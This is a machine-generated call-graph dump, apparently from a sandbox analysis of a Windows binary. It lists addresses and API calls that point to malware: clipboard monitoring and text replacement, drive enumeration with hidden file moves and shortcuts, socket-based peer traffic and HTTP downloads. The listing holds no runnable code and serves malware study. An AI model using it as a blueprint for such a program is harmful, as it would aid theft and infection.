5133->5143 5135 40e823 SysFreeString 5134->5135 5136 40e7b6 5134->5136 5135->5133 5137 40e3c0 2 API calls 5136->5137 5139 40e7c4 5137->5139 5138 40e815 5138->5135 5139->5135 5139->5138 5140 40e7f3 lstrcmpiW 5139->5140 5141 40e805 5140->5141 5142 40e80b SysFreeString 5140->5142 5141->5142 5142->5138 5144 40e3c0 2 API calls 5143->5144 5146 40e86b 5144->5146 5145 40e2d9 5145->5098 5145->5105 5146->5145 5147 40e6f0 6 API calls 5146->5147 5147->5145 5149 40e3c0 2 API calls 5148->5149 5151 40e52b 5149->5151 5150 40e315 5150->5102 5150->5103 5151->5150 5157 40e590 5151->5157 5154 40e3e6 5153->5154 5155 40e3fd 5154->5155 5156 40e420 2 API calls 5154->5156 5155->5105 5156->5155 5159 40e5b6 5157->5159 5158 40e6cd 5158->5150 5159->5158 5160 40e643 lstrcmpiW 5159->5160 5161 40e6c3 SysFreeString 5160->5161 5162 40e656 5160->5162 5161->5158 5163 40e3c0 2 API calls 5162->5163 5165 40e664 5163->5165 5164 40e6b5 5164->5161 5165->5161 5165->5164 5166 40e693 lstrcmpiW 5165->5166 5167 40e6a5 5166->5167 5168 40e6ab SysFreeString 5166->5168 5167->5168 5168->5164 5173 40ce1d 5169->5173 5170 40cdc0 _vscprintf wvsprintfA 5170->5173 5171 40ce38 SysFreeString 5171->5025 5172 40a490 9 API calls 5172->5173 5173->5170 5173->5171 5173->5172 5175 40af1c socket 5174->5175 5176 40af09 gethostbyname 5174->5176 5175->5031 5175->5032 5176->5175 5177->5031 5178->5038 5180 40e977 5179->5180 5181 40ea44 InternetConnectA 5179->5181 5180->5043 5180->5044 5182 40ebc4 InternetCloseHandle 5181->5182 5183 40ea7d HttpOpenRequestA 5181->5183 5182->5180 5184 40eab3 HttpAddRequestHeadersA HttpSendRequestA 5183->5184 5185 40ebb7 InternetCloseHandle 5183->5185 5186 40ebaa InternetCloseHandle 5184->5186 5189 40eafd 5184->5189 5185->5182 5186->5185 5187 40eb14 InternetReadFile 5188 40eb41 5187->5188 5187->5189 5188->5186 5189->5187 5189->5188 5190 40a490 9 API calls 5189->5190 5191 40eb5c memcpy 5190->5191 5191->5189 5198 406ff7 5192->5198 5193 407250 CoCreateInstance 5193->5198 5194 4071cb 5196 4071d4 SysFreeString 5194->5196 5197 406f9b SysFreeString 5194->5197 5195 40a660 _invalid_parameter 3 API calls 5195->5194 5196->5197 5197->4493 5198->5193 5199 407146 SysAllocString 5198->5199 5200 407012 5198->5200 5199->5198 5199->5200 5200->5194 5200->5195 5202 40c37a 5201->5202 5203 40c37e 5201->5203 5202->4499 5205 40c330 CryptAcquireContextW 5203->5205 5206 40c36b 5205->5206 5207 40c34d CryptGenRandom CryptReleaseContext 5205->5207 5206->5202 5207->5206 5208->4512 5260 40b280 gethostname 5209->5260 5212 40b369 5212->4512 5214 40b37c strcmp 5214->5212 5215 40b391 5214->5215 5264 40aed0 inet_ntoa 5215->5264 5217 40b39f strstr 5218 40b3f0 5217->5218 5219 40b3af 5217->5219 5267 40aed0 inet_ntoa 5218->5267 5265 40aed0 inet_ntoa 5219->5265 5222 40b3bd strstr 5222->5212 5224 40b3cd 5222->5224 5223 40b3fe strstr 5225 40b40e 5223->5225 5226 40b44f 5223->5226 5266 40aed0 inet_ntoa 5224->5266 5268 40aed0 inet_ntoa 5225->5268 5270 40aed0 inet_ntoa 5226->5270 5230 40b45d strstr 5233 40b46d 5230->5233 5234 40b4ae EnterCriticalSection 5230->5234 5231 40b3db strstr 5231->5212 5231->5218 5232 40b41c strstr 5232->5212 5235 40b42c 5232->5235 5271 40aed0 inet_ntoa 5233->5271 5237 40b4c6 5234->5237 5269 40aed0 inet_ntoa 5235->5269 5245 40b4f1 5237->5245 5273 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5237->5273 5239 40b43a strstr 5239->5212 5239->5226 5240 40b47b strstr 5240->5212 5241 40b48b 5240->5241 5272 40aed0 inet_ntoa 5241->5272 5244 40b5ea LeaveCriticalSection 5244->5212 5245->5244 5247 40a240 7 API calls 5245->5247 5246 40b499 strstr 5246->5212 5246->5234 5248 40b535 5247->5248 5248->5244 5274 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5248->5274 5250 40b553 5251 40b580 5250->5251 5252 40b576 Sleep 5250->5252 5254 40b5a5 5250->5254 5253 40a660 _invalid_parameter 3 API calls 5251->5253 5252->5250 5253->5254 5254->5244 5275 40b030 5254->5275 5256->4527 5258 40b030 14 API calls 5257->5258 5259 40b023 LeaveCriticalSection 5258->5259 5259->4519 5261 40b2a7 gethostbyname 5260->5261 5262 40b2c3 5260->5262 5261->5262 5262->5212 5263 40aed0 inet_ntoa 5262->5263 5263->5214 5264->5217 5265->5222 5266->5231 5267->5223 5268->5232 5269->5239 5270->5230 5271->5240 5272->5246 5273->5245 5274->5250 5276 40b044 5275->5276 5277 40b03f 5275->5277 5278 40a450 _invalid_parameter 7 API calls 5276->5278 5277->5244 5280 40b058 5278->5280 5279 40b0b4 CreateFileW 5281 40b103 InterlockedExchange 5279->5281 5282 40b0d7 WriteFile FlushFileBuffers CloseHandle 5279->5282 5280->5277 5280->5279 5283 40a660 _invalid_parameter 3 API calls 5281->5283 5282->5281 5283->5277 5285 40d70d 5284->5285 5286 40d643 5285->5286 5287 40d731 WaitForSingleObject 5285->5287 5286->4534 5286->4535 5287->5285 5288 40d74c CloseHandle 5287->5288 5288->5285 5290 405829 memset GetModuleHandleW 5289->5290 5291 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5290->5291 5291->5291 5292 4058a0 CreateWindowExW 5291->5292 5293 4058cb 5292->5293 5294 4058cd GetMessageA 5292->5294 5295 4058ff ExitThread 5293->5295 5296 4058e1 TranslateMessage DispatchMessageA 5294->5296 5297 4058f7 5294->5297 5296->5294 5297->5290 5297->5295 5319 40ec20 CreateFileW 5298->5319 5300 406cd8 ExitThread 5302 406b80 5302->5300 5303 406cc8 Sleep 5302->5303 5304 406bb9 5302->5304 5322 406340 GetLogicalDrives 5302->5322 5303->5302 5328 406260 5304->5328 5307 406bf0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5308 406c66 wsprintfW 5307->5308 5309 406c7b wsprintfW 5307->5309 5308->5309 5334 406650 _chkstk 5309->5334 5310 406beb 5315 407407 5312->5315 5313 4074e1 Sleep 5313->5315 5314 40742f Sleep 5314->5315 5315->5313 5315->5314 5316 40745e Sleep wsprintfA DeleteUrlCacheEntry 5315->5316 5318 40ef90 64 API calls 5315->5318 5387 40eee0 InternetOpenA 5316->5387 5318->5315 5320 40ec68 5319->5320 5321 40ec4f GetFileSize CloseHandle 5319->5321 5320->5302 5321->5320 5327 40636d 5322->5327 5323 4063e6 5323->5302 5324 40637c RegOpenKeyExW 5325 40639e RegQueryValueExW 5324->5325 5324->5327 5326 4063da RegCloseKey 5325->5326 5325->5327 5326->5327 5327->5323 5327->5324 5327->5326 5329 4062b9 5328->5329 5330 40627c 5328->5330 5329->5307 5329->5310 5369 4062c0 GetDriveTypeW 5330->5369 5333 4062ab lstrcpyW 5333->5329 5335 406667 5334->5335 5336 40666e 6 API calls 5334->5336 5335->5310 5337 406722 5336->5337 5338 406764 PathFileExistsW 5336->5338 5341 40ec20 3 API calls 5337->5341 5339 406803 PathFileExistsW 5338->5339 5340 406779 SetFileAttributesW DeleteFileW PathFileExistsW 5338->5340 5344 406814 5339->5344 5345 406859 FindFirstFileW 5339->5345 5342 4067a9 CreateDirectoryW 5340->5342 5343 4067cb PathFileExistsW 5340->5343 5346 40672e 5341->5346 5342->5343 5348 4067bc SetFileAttributesW 5342->5348 5343->5339 5349 4067dc CopyFileW 5343->5349 5350 406834 5344->5350 5351 40681c 5344->5351 5345->5335 5362 406880 5345->5362 5346->5338 5347 406745 SetFileAttributesW DeleteFileW 5346->5347 5347->5338 5348->5343 5349->5339 5353 4067f4 SetFileAttributesW 5349->5353 5355 406400 3 API calls 5350->5355 5374 406400 CoInitialize CoCreateInstance 5351->5374 5352 406942 lstrcmpW 5356 406958 lstrcmpW 5352->5356 5352->5362 5353->5339 5357 40682f SetFileAttributesW 5355->5357 5356->5362 5357->5345 5359 406b19 FindNextFileW 5359->5352 5360 406b35 FindClose 5359->5360 5360->5335 5361 40699e lstrcmpiW 5361->5362 5362->5352 5362->5359 5362->5361 5363 406a05 PathMatchSpecW 5362->5363 5365 406a83 PathFileExistsW 5362->5365 5378 406510 CreateDirectoryW wsprintfW FindFirstFileW 5362->5378 5363->5362 5364 406a26 wsprintfW SetFileAttributesW DeleteFileW 5363->5364 5364->5362 5365->5362 5366 406a99 wsprintfW wsprintfW 5365->5366 5366->5362 5367 406b03 MoveFileExW 5366->5367 5367->5359 5370 40629f 5369->5370 5371 4062e8 5369->5371 5370->5329 5370->5333 5371->5370 5372 4062fc QueryDosDeviceW 5371->5372 5372->5370 5373 406316 StrCmpNW 5372->5373 5373->5370 5375 406436 5374->5375 5377 406472 5374->5377 5376 406440 wsprintfW 5375->5376 5375->5377 5376->5377 5377->5357 5379 406565 lstrcmpW 5378->5379 5380 40663f 5378->5380 5381 406591 5379->5381 5382 40657b lstrcmpW 5379->5382 5380->5362 5384 40660c FindNextFileW 5381->5384 5382->5381 5383 406593 wsprintfW wsprintfW 5382->5383 5383->5381 5385 4065f6 MoveFileExW 5383->5385 5384->5379 5386 406628 FindClose RemoveDirectoryW 5384->5386 5385->5384 5386->5380 5388 40ef06 InternetOpenUrlA 5387->5388 5389 40ef78 Sleep 5387->5389 5390 40ef25 HttpQueryInfoA 5388->5390 5391 40ef6e InternetCloseHandle 5388->5391 5389->5315 5392 40ef64 InternetCloseHandle 5390->5392 5393 40ef4e 5390->5393 5391->5389 5392->5391 5393->5392 5394 40cf40 5399 40b1f0 5394->5399 5398 40cf6a 5400 40b280 2 API calls 5399->5400 5401 40b1ff 5400->5401 5402 40b209 5401->5402 5403 40b20d EnterCriticalSection 5401->5403 5402->5398 5406 40cf80 InterlockedExchangeAdd 5402->5406 5404 40b22c LeaveCriticalSection 5403->5404 5404->5402 5407 40cf96 5406->5407 5408 40cf9d 5406->5408 5407->5398 5423 40d270 5408->5423 5411 40cfbd InterlockedIncrement 5420 40cfc7 5411->5420 5413 40cff0 5433 40aed0 inet_ntoa 5413->5433 5415 40cffc 5417 40d0c0 InterlockedDecrement 5415->5417 5416 40d1a0 6 API calls 5416->5420 5448 40aff0 shutdown closesocket 5417->5448 5419 40a450 _invalid_parameter 7 API calls 5419->5420 5420->5413 5420->5416 5420->5417 5420->5419 5421 40a660 _invalid_parameter 3 API calls 5420->5421 5430 40b9d0 5420->5430 5434 40ba20 5420->5434 5421->5420 5424 40d27d socket 5423->5424 5425 40d292 htons connect 5424->5425 5426 40d2ef 5424->5426 5425->5426 5427 40d2da 5425->5427 5426->5424 5428 40cfad 5426->5428 5449 40aff0 shutdown closesocket 5427->5449 5428->5407 5428->5411 5450 40b930 5430->5450 5433->5415 5444 40ba31 5434->5444 5436 40ba4f 5438 40a660 _invalid_parameter 3 API calls 5436->5438 5439 40bdff 5438->5439 5439->5420 5440 40be10 21 API calls 5440->5444 5443 40b9d0 13 API calls 5443->5444 5444->5436 5444->5440 5444->5443 5445 40b330 32 API calls 5444->5445 5458 40bf60 5444->5458 5465 40b700 EnterCriticalSection 5444->5465 5470 406e20 5444->5470 5475 406ec0 5444->5475 5480 406cf0 5444->5480 5487 406df0 5444->5487 5445->5444 5448->5407 5449->5428 5451 40c3b0 3 API calls 5450->5451 5452 40b93b 5451->5452 5453 40b957 lstrlenA 5452->5453 5454 40c640 7 API calls 5453->5454 5455 40b98d 5454->5455 5456 40b9b8 5455->5456 5457 40a660 _invalid_parameter 3 API calls 5455->5457 5456->5420 5457->5456 5459 40bf71 lstrlenA 5458->5459 5460 40c640 7 API calls 5459->5460 5463 40bf8f 5460->5463 5461 40bf9b 5462 40c01f 5461->5462 5464 40a660 _invalid_parameter 3 API calls 5461->5464 5462->5444 5463->5459 5463->5461 5464->5462 5466 40b718 5465->5466 5467 40b754 LeaveCriticalSection 5466->5467 5490 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5466->5490 5467->5444 5469 40b743 5469->5467 5491 406e60 5470->5491 5473 40d610 17 API calls 5474 406e59 5473->5474 5474->5444 5476 406e60 75 API calls 5475->5476 5477 406edf 5476->5477 5478 406f0c 5477->5478 5506 406f20 5477->5506 5478->5444 5509 405f40 EnterCriticalSection 5480->5509 5482 406d0a 5483 406d3d 5482->5483 5514 406d50 5482->5514 5483->5444 5486 40a660 _invalid_parameter 3 API calls 5486->5483 5521 406000 EnterCriticalSection 5487->5521 5489 406e12 5489->5444 5490->5469 5494 406e73 5491->5494 5492 406e34 5492->5473 5492->5474 5494->5492 5495 405e50 EnterCriticalSection 5494->5495 5496 40ccd0 71 API calls 5495->5496 5497 405e6e 5496->5497 5498 405f2b LeaveCriticalSection 5497->5498 5499 405e87 5497->5499 5502 405ea8 5497->5502 5498->5494 5500 405e91 memcpy 5499->5500 5501 405ea6 5499->5501 5500->5501 5503 40a660 _invalid_parameter 3 API calls 5501->5503 5502->5501 5505 405f06 memcpy 5502->5505 5504 405f28 5503->5504 5504->5498 5505->5501 5507 40b930 13 API calls 5506->5507 5508 406f65 5507->5508 5508->5478 5510 405f5e 5509->5510 5511 405fea LeaveCriticalSection 5510->5511 5512 40a6d0 8 API calls 5510->5512 5511->5482 5513 405fbc 5512->5513 5513->5511 5515 40a450 _invalid_parameter 7 API calls 5514->5515 5516 406d62 memcpy 5515->5516 5517 40b930 13 API calls 5516->5517 5518 406dcc 5517->5518 5519 40a660 _invalid_parameter 3 API calls 5518->5519 5520 406d31 5519->5520 5520->5486 5546 40cd30 5521->5546 5524 406243 LeaveCriticalSection 5524->5489 5525 40ccd0 71 API calls 5526 406039 5525->5526 5526->5524 5527 406158 5526->5527 5529 406094 memcpy 5526->5529 5528 406181 5527->5528 5530 405c90 75 API calls 5527->5530 5531 40a660 _invalid_parameter 3 API calls 5528->5531 5532 40a660 _invalid_parameter 3 API calls 5529->5532 5530->5528 5533 4061a2 5531->5533 5534 4060b8 5532->5534 5533->5524 5535 4061b1 CreateFileW 5533->5535 5536 40a6d0 8 API calls 5534->5536 5535->5524 5537 4061d4 5535->5537 5538 4060c8 5536->5538 5541 4061f1 WriteFile 5537->5541 5542 40622f FlushFileBuffers CloseHandle 5537->5542 5539 40a660 _invalid_parameter 3 API calls 5538->5539 5540 4060ef 5539->5540 5543 40c640 7 API calls 5540->5543 5541->5537 5542->5524 5544 406125 5543->5544 5545 4072a0 71 API calls 5544->5545 5545->5527 5549 40c280 5546->5549 5551 40c291 5549->5551 5550 40a6d0 8 API calls 5550->5551 5551->5550 5552 40c1e0 70 API calls 5551->5552 5555 407fa0 68 API calls 5551->5555 5556 40c2ab 5551->5556 5557 40c2eb memcmp 5551->5557 5552->5551 5553 40a660 _invalid_parameter 3 API calls 5554 406022 5553->5554 5554->5524 5554->5525 5555->5551 5556->5553 5557->5551 5557->5556 5719 40d400 5720 40d416 5719->5720 5737 40d46e 5719->5737 5721 40d420 5720->5721 5722 40d473 5720->5722 5723 40d4c3 5720->5723 5720->5737 5724 40a240 7 API calls 5721->5724 5726 40d498 5722->5726 5727 40d48b InterlockedDecrement 5722->5727 5746 40c070 5723->5746 5728 40d42d 5724->5728 5729 40a660 _invalid_parameter 3 API calls 5726->5729 5727->5726 5742 4023d0 5728->5742 5731 40d4a4 5729->5731 5732 40a660 _invalid_parameter 3 API calls 5731->5732 5732->5737 5734 40b1f0 4 API calls 5735 40d44f 5734->5735 5736 40d45b InterlockedIncrement 5735->5736 5735->5737 5736->5737 5739 40d521 IsBadReadPtr 5740 40d4e9 5739->5740 5740->5737 5740->5739 5741 40ba20 194 API calls 5740->5741 5751 40c170 5740->5751 5741->5740 5743 402413 5742->5743 5744 4023d9 5742->5744 5743->5734 5744->5743 5745 4023ea InterlockedIncrement 5744->5745 5745->5743 5747 40c083 5746->5747 5748 40c0ad memcpy 5746->5748 5749 40a490 9 API calls 5747->5749 5748->5740 5750 40c0a4 5749->5750 5750->5748 5752 40c199 5751->5752 5753 40c18e 5751->5753 5752->5753 5754 40c1b1 memmove 5752->5754 5753->5740 5754->5753 5755 40da00 5765 4013b0 5755->5765 5757 40b6b0 5 API calls 5760 40da0d 5757->5760 5758 40da27 InterlockedExchangeAdd 5759 40da6b WaitForSingleObject 5758->5759 5758->5760 5759->5760 5761 40da84 5759->5761 5760->5757 5760->5758 5760->5759 5762 40b9d0 13 API calls 5760->5762 5764 40da8d 5760->5764 5777 401330 5761->5777 5762->5760 5766 40a240 7 API calls 5765->5766 5767 4013bb CreateEventA socket 5766->5767 5768 4013f2 5767->5768 5769 4013f8 5767->5769 5770 401330 8 API calls 5768->5770 5771 401401 bind 5769->5771 5772 401462 5769->5772 5770->5769 5773 401444 CreateThread 5771->5773 5774 401434 5771->5774 5772->5760 5773->5772 5787 401100 5773->5787 5775 401330 8 API calls 5774->5775 5776 40143a 5775->5776 5776->5760 5778 401339 5777->5778 5784 40139b 5777->5784 5779 401341 SetEvent WaitForSingleObject CloseHandle 5778->5779 5778->5784 5785 401369 5779->5785 5786 40138b 5779->5786 5781 401395 5783 40a660 _invalid_parameter 3 API calls 5781->5783 5782 40a660 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5782->5785 5783->5784 5784->5764 5785->5782 5785->5786 5816 40aff0 shutdown closesocket 5786->5816 5788 401115 ioctlsocket 5787->5788 5789 4011e4 5788->5789 5794 40113a 5788->5794 5790 40a660 _invalid_parameter 3 API calls 5789->5790 5792 4011ea 5790->5792 5791 4011cd WaitForSingleObject 5791->5788 5791->5789 5793 40a490 9 API calls 5793->5794 5794->5791 5794->5793 5795 401168 recvfrom 5794->5795 5796 4011ad InterlockedExchangeAdd 5794->5796 5795->5791 5795->5794 5798 401000 5796->5798 5799 401014 5798->5799 5800 40103b 5799->5800 5801 40a240 7 API calls 5799->5801 5809 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5800->5809 5801->5800 5803 40105b 5810 401580 5803->5810 5805 4010ec 5805->5794 5806 4010a3 IsBadReadPtr 5807 401071 5806->5807 5807->5805 5807->5806 5808 4010d8 memmove 5807->5808 5808->5807 5809->5803 5811 401592 5810->5811 5812 4015a5 memcpy 5810->5812 5814 40a490 9 API calls 5811->5814 5813 4015c1 5812->5813 5813->5807 5815 40159f 5814->5815 5815->5812 5816->5781 5817 40d980 5818 40ba20 194 API calls 5817->5818 5819 40d9b8 5818->5819 5820 40d580 5825 401b60 5820->5825 5822 40d595 5823 40d5b4 5822->5823 5824 401b60 16 API calls 5822->5824 5824->5823 5826 401b70 5825->5826 5844 401c42 5825->5844 5827 40a240 7 API calls 5826->5827 5826->5844 5828 401b9d 5827->5828 5829 40a6d0 8 API calls 5828->5829 5828->5844 5830 401bc9 5829->5830 5831 401be6 5830->5831 5832 401bd6 5830->5832 5834 401ae0 4 API calls 5831->5834 5833 40a660 _invalid_parameter 3 API calls 5832->5833 5835 401bdc 5833->5835 5836 401bf3 5834->5836 5835->5822 5837 401c33 5836->5837 5838 401bfc EnterCriticalSection 5836->5838 5841 40a660 _invalid_parameter 3 API calls 5837->5841 5839 401c13 5838->5839 5840 401c1f LeaveCriticalSection 5838->5840 5839->5840 5840->5822 5842 401c3c 5841->5842 5843 40a660 _invalid_parameter 3 API calls 5842->5843 5843->5844 5844->5822 5558 4069c8 5566 40696e 5558->5566 5559 40699e lstrcmpiW 5559->5566 5560 406b19 FindNextFileW 5562 406942 lstrcmpW 5560->5562 5563 406b35 FindClose 5560->5563 5561 406a05 PathMatchSpecW 5564 406a26 wsprintfW SetFileAttributesW DeleteFileW 5561->5564 5561->5566 5565 406958 lstrcmpW 5562->5565 5562->5566 5568 406b42 5563->5568 5564->5566 5565->5566 5566->5559 5566->5560 5566->5561 5567 406a83 PathFileExistsW 5566->5567 5571 406510 11 API calls 5566->5571 5567->5566 5569 406a99 wsprintfW wsprintfW 5567->5569 5569->5566 5570 406b03 MoveFileExW 5569->5570 5570->5560 5571->5566 5572 40f34c 5573 40f354 5572->5573 5575 40f408 5573->5575 5578 40f589 5573->5578 5577 40f38d 5577->5575 5582 40f474 RtlUnwind 5577->5582 5580 40f59e 5578->5580 5581 40f5ba 5578->5581 5579 40f629 NtQueryVirtualMemory 5579->5581 5580->5579 5580->5581 5581->5577 5583 40f48c 5582->5583 5583->5577 5584 40b8d0 5585 40b8d3 WaitForSingleObject 5584->5585 5586 40b901 5585->5586 5587 40b8eb InterlockedDecrement 5585->5587 5588 40b8fa 5587->5588 5588->5585 5589 40b010 16 API calls 5588->5589 5589->5588 5590 401f50 GetQueuedCompletionStatus 5591 401f92 5590->5591 5592 402008 5590->5592 5593 401f97 WSAGetOverlappedResult 5591->5593 5597 401d60 5591->5597 5593->5591 5594 401fb9 WSAGetLastError 5593->5594 5594->5591 5596 401fd3 GetQueuedCompletionStatus 5596->5591 5596->5592 5598 401ef2 InterlockedDecrement setsockopt closesocket 5597->5598 5599 401d74 5597->5599 5601 401e39 5598->5601 5599->5598 5600 401d7c 5599->5600 5617 40d950 NtQuerySystemTime RtlTimeToSecondsSince1980 5600->5617 5601->5596 5603 401d81 InterlockedExchange 5604 401d98 5603->5604 5605 401e4e 5603->5605 5604->5601 5610 401da9 InterlockedDecrement 5604->5610 5611 401dbc InterlockedDecrement InterlockedExchangeAdd 5604->5611 5606 401e67 5605->5606 5607 401e57 InterlockedDecrement 5605->5607 5608 401e72 5606->5608 5609 401e87 InterlockedDecrement 5606->5609 5607->5596 5626 401ae0 WSASend 5608->5626 5613 401ee9 5609->5613 5610->5596 5614 401e2f 5611->5614 5613->5596 5618 401cf0 5614->5618 5615 401e7e 5615->5596 5617->5603 5619 401d00 InterlockedExchangeAdd 5618->5619 5620 401cfc 5618->5620 5621 401d53 5619->5621 5622 401d17 InterlockedIncrement 5619->5622 5620->5601 5621->5601 5632 401c50 WSARecv 5622->5632 5624 401d46 5624->5621 5625 401d4c InterlockedDecrement 5624->5625 5625->5621 5627 401b50 5626->5627 5628 401b12 WSAGetLastError 5626->5628 5627->5615 5628->5627 5629 401b1f 5628->5629 5630 401b56 5629->5630 5631 401b26 Sleep WSASend 5629->5631 5630->5615 5631->5627 5631->5628 5633 401cd2 5632->5633 5634 401c8e 5632->5634 5633->5624 5635 401c90 WSAGetLastError 5634->5635 5636 401ca4 Sleep WSARecv 5634->5636 5637 401cdb 5634->5637 5635->5633 5635->5634 5636->5633 5636->5635 5637->5624 5638 40d9d0 5641 401200 5638->5641 5640 40d9f2 5642 40121d 5641->5642 5656 401314 5641->5656 5643 40a450 _invalid_parameter 7 API calls 5642->5643 5642->5656 5644 401247 memcpy htons 5643->5644 5645 4012ed 5644->5645 5646 401297 sendto 5644->5646 5649 40a660 _invalid_parameter 3 API calls 5645->5649 5647 4012b6 InterlockedExchangeAdd 5646->5647 5648 4012e9 5646->5648 5647->5646 5650 4012cc 5647->5650 5648->5645 5651 40130a 5648->5651 5652 4012fc 5649->5652 5653 40a660 _invalid_parameter 3 API calls 5650->5653 5654 40a660 _invalid_parameter 3 API calls 5651->5654 5652->5640 5655 4012db 5653->5655 5654->5656 5655->5640 5656->5640 5845 405910 GetWindowLongW 5846 405934 5845->5846 5847 405956 5845->5847 5848 405941 5846->5848 5849 4059c7 IsClipboardFormatAvailable 5846->5849 5850 4059a6 5847->5850 5851 40598e SetWindowLongW 5847->5851 5862 405951 5847->5862 5854 405964 SetClipboardViewer SetWindowLongW 5848->5854 5855 405947 5848->5855 5852 4059e3 IsClipboardFormatAvailable 5849->5852 5853 4059da 5849->5853 5857 4059ac SendMessageA 5850->5857 5850->5862 5851->5862 5852->5853 5858 4059f8 IsClipboardFormatAvailable 5852->5858 5860 405a15 OpenClipboard 5853->5860 5879 405adc 5853->5879 5856 405b44 DefWindowProcA 5854->5856 5859 405afd RegisterRawInputDevices ChangeClipboardChain 5855->5859 5855->5862 5857->5862 5858->5853 5859->5856 5863 405a25 GetClipboardData 5860->5863 5860->5879 5861 405ae5 SendMessageA 5861->5862 5862->5856 5863->5862 5864 405a3d GlobalLock 5863->5864 5864->5862 5865 405a55 5864->5865 5866 405a68 5865->5866 5867 405a89 5865->5867 5868 405a9e 5866->5868 5869 405a6e 5866->5869 5870 405630 13 API calls 5867->5870 5886 405750 5868->5886 5871 405a74 GlobalUnlock CloseClipboard 5869->5871 5880 405510 5869->5880 5870->5871 5875 405ac7 5871->5875 5871->5879 5894 4048a0 lstrlenW 5875->5894 5878 40a660 _invalid_parameter 3 API calls 5878->5879 5879->5861 5879->5862 5883 40551b 5880->5883 5881 405521 lstrlenW 5881->5883 5885 405534 5881->5885 5882 40a450 _invalid_parameter 7 API calls 5882->5883 5883->5881 5883->5882 5884 405551 lstrcpynW 5883->5884 5883->5885 5884->5883 5884->5885 5885->5871 5891 40575d 5886->5891 5887 405763 lstrlenA 5887->5891 5892 405776 5887->5892 5888 4055d0 2 API calls 5888->5891 5889 40a450 _invalid_parameter 7 API calls 5889->5891 5891->5887 5891->5888 5891->5889 5891->5892 5893 40a660 _invalid_parameter 3 API calls 5891->5893 5931 405700 5891->5931 5892->5871 5893->5891 5903 4048d4 5894->5903 5895 404d5e StrStrW 5896 404d71 5895->5896 5897 404d75 StrStrW 5895->5897 5896->5897 5898 404d88 5897->5898 5899 404d8c StrStrW 5897->5899 5898->5899 5900 404d9f 5899->5900 5901 404ae2 5900->5901 5902 404e09 isalpha 5900->5902 5915 404e43 5900->5915 5901->5878 5902->5900 5904 404e20 isdigit 5902->5904 5903->5901 5905 404c69 StrStrW 5903->5905 5908 404af4 5903->5908 5904->5900 5904->5901 5906 404c94 StrStrW 5905->5906 5905->5908 5907 404cbf StrStrW 5906->5907 5906->5908 5907->5908 5908->5895 5908->5901 5909 405351 StrStrW 5913 405364 5909->5913 5914 40536b StrStrW 5909->5914 5910 405303 StrStrW 5911 405316 5910->5911 5912 40531d StrStrW 5910->5912 5911->5912 5916 405330 5912->5916 5917 405337 StrStrW 5912->5917 5913->5914 5918 405385 StrStrW 5914->5918 5919 40537e 5914->5919 5915->5909 5915->5910 5916->5917 5917->5909 5920 40534a 5917->5920 5921 405398 5918->5921 5922 40539f StrStrW 5918->5922 5919->5918 5920->5909 5921->5922 5923 4053b2 5922->5923 5924 4053b9 StrStrW 5922->5924 5923->5924 5925 4053cc lstrlenA 5924->5925 5925->5901 5927 405492 GlobalAlloc 5925->5927 5927->5901 5928 4054ad GlobalLock 5927->5928 5928->5901 5929 4054c0 memcpy GlobalUnlock OpenClipboard 5928->5929 5929->5901 5930 4054ed EmptyClipboard SetClipboardData CloseClipboard 5929->5930 5930->5901 5932 40570b 5931->5932 5933 405711 lstrlenA 5932->5933 5934 4055d0 2 API calls 5932->5934 5935 405744 5932->5935 5933->5932 5934->5932 5935->5891 5657 40e5d1 5659 40e5da 5657->5659 5658 40e6cd 5659->5658 5660 40e643 lstrcmpiW 5659->5660 5661 40e6c3 SysFreeString 5660->5661 5662 40e656 5660->5662 5661->5658 5663 40e3c0 2 API calls 5662->5663 5665 40e664 5663->5665 5664 40e6b5 5664->5661 5665->5661 5665->5664 5666 40e693 lstrcmpiW 5665->5666 5667 40e6a5 5666->5667 5668 40e6ab SysFreeString 5666->5668 5667->5668 5668->5664 5669 40f354 5670 40f372 5669->5670 5671 40f408 5669->5671 5672 40f589 NtQueryVirtualMemory 5670->5672 5674 40f38d 5672->5674 5673 40f474 RtlUnwind 5673->5674 5674->5671 5674->5673 5936 405f1d 5937 405eb1 5936->5937 5938 405f1b 5937->5938 5942 405f06 memcpy 5937->5942 5939 40a660 _invalid_parameter 3 API calls 5938->5939 5940 405f28 LeaveCriticalSection 5939->5940 5942->5938 5675 40d0e0 5680 40d140 5675->5680 5678 40d10e 5679 40d140 send 5679->5678 5681 40d151 send 5680->5681 5682 40d16e 5681->5682 5683 40d0f3 5681->5683 5682->5681 5682->5683 5683->5678 5683->5679 5684 40d360 5687 40d364 5684->5687 5686 40d380 WaitForSingleObject 5686->5687 5689 40d3a5 5686->5689 5687->5686 5688 40cf80 208 API calls 5687->5688 5687->5689 5690 40b6b0 EnterCriticalSection 5687->5690 5688->5687 5691 40b6e7 LeaveCriticalSection 5690->5691 5692 40b6cf 5690->5692 5691->5687 5693 40c370 3 API calls 5692->5693 5694 40b6da 5693->5694 5694->5691 5943 40daa0 5949 401470 5943->5949 5945 40dab4 5946 40dadf 5945->5946 5947 40dac5 WaitForSingleObject 5945->5947 5948 401330 8 API calls 5947->5948 5948->5946 5950 401483 5949->5950 5951 401572 5949->5951 5950->5951 5952 40a240 7 API calls 5950->5952 5951->5945 5953 401498 CreateEventA socket 5952->5953 5954 4014d5 5953->5954 5955 4014cf 5953->5955 5954->5951 5957 4014e2 htons setsockopt bind 5954->5957 5956 401330 8 API calls 5955->5956 5956->5954 5958 401546 5957->5958 5959 401558 CreateThread 5957->5959 5960 401330 8 API calls 5958->5960 5959->5951 5962 401100 20 API calls _invalid_parameter 5959->5962 5961 40154c 5960->5961 5961->5945 5963 401920 GetTickCount WaitForSingleObject 5964 401ac9 5963->5964 5965 40194d WSAWaitForMultipleEvents 5963->5965 5966 4019f0 GetTickCount 5965->5966 5967 40196a WSAEnumNetworkEvents 5965->5967 5968 401a43 GetTickCount 5966->5968 5969 401a05 EnterCriticalSection 5966->5969 5967->5966 5979 401983 5967->5979 5972 401ab5 WaitForSingleObject 5968->5972 5973 401a4e EnterCriticalSection 5968->5973 5970 401a16 5969->5970 5971 401a3a LeaveCriticalSection 5969->5971 5977 401a29 LeaveCriticalSection 5970->5977 6005 401820 5970->6005 5971->5972 5972->5964 5972->5965 